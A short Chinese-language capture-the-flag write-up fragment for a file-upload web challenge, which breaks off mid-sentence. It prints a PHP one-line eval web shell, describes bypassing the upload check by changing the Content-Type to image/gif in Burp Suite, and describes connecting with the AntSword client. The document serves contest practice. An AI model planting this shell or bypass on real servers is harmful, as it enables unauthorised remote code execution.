i春秋練習——第三屆「百越杯」福建省高校網絡空間安全大賽-web-do you know upload

首先是一個文件上傳,比較基礎。選擇上傳111.php,內容是一句話馬<?php eval($_POST['cmd']);?>  burpsuit抓包修改Content-Type爲image/gif(任一種圖片都行),這類漏洞可以搭建一個upload-lab本地練一練。 顯示上傳成功  接下來使用蟻劍連接,連接密碼就是之前一句話寫的cmd,編碼器可以選default,這題沒啥關係。 多出來的h.jp
相關文章
相關標籤/搜索